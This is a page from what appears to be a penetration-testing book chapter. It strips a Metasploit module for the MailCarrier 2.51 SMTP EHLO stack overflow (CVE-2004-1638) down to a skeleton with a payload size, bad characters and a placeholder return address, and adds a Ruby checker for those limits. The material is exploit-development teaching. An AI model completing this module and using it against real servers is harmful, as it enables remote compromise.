218
Chapter 15
Stripping the Existing Exploit
As our first step in porting the MailCarrier exploit, we’ll strip down the existing Metasploit module to a simple skeleton file, as shown here:
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
      'Description'    => %q{
          This module exploits the MailCarrier v2.51 suite SMTP service.
          The stack is overwritten when sending an overly long EHLO command.
      },
      'Author'         => [ 'Your Name' ],
      'Arch'           => [ ARCH_X86 ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 7724 $',
      'References'     =>
        [
          [ 'CVE', '2004-1638' ],
          [ 'OSVDB', '11174' ],
          [ 'BID', '11535' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/598' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'           => 300,                 # bytes available for the payload
          'BadChars'        => "\x00\x0a\x0d\x3a",  # bytes the encoder must avoid
          'StackAdjustment' => -3500,
        },
      'Platform'       => ['win'],
      'Targets'        =>
        [
          # 0xdeadbeef is a placeholder; the real return address is filled in later
          [ 'Windows XP SP2 - EN', { 'Ret' => 0xdeadbeef } ],
        ],
      'DisclosureDate' => 'Oct 26 2004',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(25),
        Opt::LHOST(), # Required for stack offset
      ], self.class)
  end
end
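The 'Space' and 'BadChars' entries above are the two constraints Metasploit's encoder enforces when it generates a payload for this module. The following checker, an added example that is not from the book or the framework, applies those same constraints to a candidate byte string so you can see what they mean: NUL terminates C strings, CR and LF end the SMTP command line, and 0x3a (':') is listed as unusable by the module; `check_payload` is a name chosen for this illustration.

```ruby
# Added example, not part of the original module: applies the skeleton's
# 'Space' => 300 and 'BadChars' => "\x00\x0a\x0d\x3a" constraints to a
# candidate payload buffer and reports every violation.

PAYLOAD_SPACE = 300                   # from 'Space' => 300
BAD_CHARS     = "\x00\x0a\x0d\x3a".b  # NUL, LF, CR, ':' (from 'BadChars')

# Returns an array of problem descriptions; an empty array means the
# payload fits in the available space and avoids every bad character.
def check_payload(payload)
  payload  = payload.b   # treat as raw bytes regardless of source encoding
  problems = []

  if payload.bytesize > PAYLOAD_SPACE
    problems << "too long: #{payload.bytesize} > #{PAYLOAD_SPACE} bytes"
  end

  bad = BAD_CHARS.bytes
  payload.each_byte.with_index do |byte, offset|
    if bad.include?(byte)
      problems << format("bad char 0x%02x at offset %d", byte, offset)
    end
  end

  problems
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs for demonstration only.
  p check_payload("A" * 300)        # => []
  p check_payload("EHLO\x0d\x0a")   # => ["bad char 0x0d at offset 4", "bad char 0x0a at offset 5"]
end
```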